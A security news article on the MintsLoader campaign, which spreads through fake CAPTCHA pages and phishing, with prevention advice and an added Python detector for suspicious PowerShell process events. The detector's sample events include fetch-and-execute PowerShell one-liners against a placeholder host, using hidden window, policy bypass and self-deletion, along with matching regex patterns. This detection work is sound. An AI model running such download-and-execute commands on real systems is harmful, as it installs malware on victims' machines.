MintsLoader Malware Spreads via Fake CAPTCHA Pages

MintsLoader malware is being used in cyberattacks targeting businesses in the U.S. and Europe. A recent report reveals that attackers distribute MintsLoader through fake CAPTCHA pages and spam emails. The malware acts as a loader, delivering second-stage payloads such as StealC, an information stealer, and BOINC, a legitimate open-source distributed-computing client that is abused here.

Attackers trick victims into running MintsLoader through phishing emails. Clicking the link leads to a fake verification page that urges the user to copy a PowerShell command and paste it into their own machine. That command downloads and runs MintsLoader, which then deletes itself from disk to hinder detection. In other cases, a disguised JavaScript file triggers the infection when opened.
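The paste-and-run infection path above leaves a recognisable trace: a PowerShell process, launched from a user-driven parent, whose command line fetches remote content, executes it inline, and cleans up after itself. The following is an added detection example (not code from the report or from the malware): it scores constructed process-creation events, in the shape of normalised Sysmon/EDR telemetry, against indicators drawn from that description. The indicator weights and alert threshold are assumptions and should be tuned against your own baseline of benign PowerShell use.

```python
import re

# Constructed sample process-creation events (not real telemetry). The domain
# example.invalid is a placeholder; only the command-line shape matters here.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -w hidden -c \"iex ((New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/v'))\""},
    {"host": "ws02", "parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell -nop -ep bypass -c \"iwr http://example.invalid/s | iex; "
            "Remove-Item $MyInvocation.MyCommand.Path\""},
    {"host": "ws03", "parent": "code.exe", "image": "powershell.exe",
     "cmd": "powershell -File C:\\scripts\\backup.ps1"},
    {"host": "ws04", "parent": "services.exe", "image": "powershell.exe",
     "cmd": "powershell -c Get-Service | Out-File C:\\temp\\svc.txt"},
]

# (name, regex, weight): weights are an assumption for this example.
INDICATORS = [
    ("remote_fetch", re.compile(r"downloadstring|downloadfile|invoke-webrequest"
                                r"|\biwr\b|\bcurl\b|\bwget\b|net\.webclient", re.I), 2),
    ("inline_exec", re.compile(r"invoke-expression|\biex\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), 1),
    ("self_delete", re.compile(r"remove-item|\bdel\b|\brm\b", re.I), 1),
]

# Parents typical of a pasted command (Run dialog, shell) or a double-clicked
# script, matching the fake-CAPTCHA and disguised-JavaScript paths described.
USER_DRIVEN_PARENTS = {"explorer.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

ALERT_THRESHOLD = 4  # assumption; tune against benign admin activity

def score_event(ev):
    """Return (score, matched indicator names) for one process-creation event."""
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    hits = [name for name, rx, _ in INDICATORS if rx.search(ev["cmd"])]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A user-driven parent only matters when the command line itself is odd.
    if hits and ev["parent"].lower() in USER_DRIVEN_PARENTS:
        hits.append("user_driven_parent")
        score += 1
    return score, hits

def find_suspicious(events, threshold=ALERT_THRESHOLD):
    """Return (host, score, hits) for events scoring at or above the threshold."""
    return [(ev["host"], s, h) for ev in events
            for s, h in [score_event(ev)] if s >= threshold]
```

On the constructed events, ws01 and ws02 alert (fetch, inline execution, hidden window or policy bypass, self-deletion, user-driven parent) while the scripted backup and service inventory on ws03 and ws04 score zero.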

Once active, MintsLoader contacts a command-and-control (C2) server. It downloads additional PowerShell scripts that help it evade detection and adapt to whatever security tooling is present on the host. The malware also uses a Domain Generation Algorithm (DGA) to derive new C2 domains each day, so that static domain blocklists and tracking quickly fall out of date.

Eventually, MintsLoader installs StealC, an advanced information stealer available through malware-as-a-service (MaaS). It is designed to extract sensitive data while avoiding detection in certain countries. This campaign is part of a larger wave of malware threats, including the rebranded Astolfo Loader, which evolved from JinxLoader.

Another related campaign abuses search engine optimization (SEO) poisoning. Hackers manipulate search results to lure users into downloading malware from fake websites. Victims searching for contracts or agreements are redirected to compromised WordPress sites, where a malicious download is disguised as a legitimate file.

Preventive Measures

To stay safe, users should avoid clicking on suspicious links or pasting commands from unknown sources. Treat any CAPTCHA or verification page that asks you to run a command with suspicion, since a genuine CAPTCHA never requires pasting anything into your system. Businesses should implement security awareness training and use endpoint protection capable of detecting malicious scripts, including PowerShell launched from unusual parent processes. Regular updates and monitoring can help prevent infections.